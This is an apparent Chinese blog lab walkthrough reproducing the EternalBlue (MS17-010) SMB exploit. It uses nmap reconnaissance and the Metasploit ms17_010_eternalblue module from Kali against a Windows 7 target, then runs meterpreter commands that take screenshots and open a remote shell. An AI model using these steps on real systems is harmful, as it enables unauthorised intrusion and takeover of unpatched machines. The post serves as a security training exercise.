永恒之蓝漏洞复现

永恒之蓝漏洞复现

一、永恒之蓝漏洞简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二、实验环境

kali linux(攻击者)
windows 7(靶机)

三、实验步骤

1.信息搜集

  • 查看本机(kali linux)IP,可查询到本机的IP为 192.168.60.129
ifconfig

  • 查看与本机同一网段的主机IP,可查询到靶机(windows 7)的IP为192.168.60.130.
nmap 192.168.60.129

  • 进一步了解靶机信息,得到靶机为window 7
namp -O 192.168.60.130

2.开始攻击

  • 启动msf
msfconsole

  • 使用exploit/windows/smb/ms17_010_eternalblue进行攻击
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue


  • 查看漏洞基本设置
show options

  • 设置目标IP为192.168.60.130
set RHOSTS 192.168.60.130

  • 开始执行
run

3.继续攻击

sysinfo             ///查看主机信息
getuid              ///获取靶机用户名 
screenshot          ///对靶机进行截图
shell               ///获取靶机控制台

posted @   ccentury  阅读(138)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· SQL Server 2025 AI相关能力初探
· 单线程的Redis速度为什么快?
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
点击右上角即可分享
微信分享提示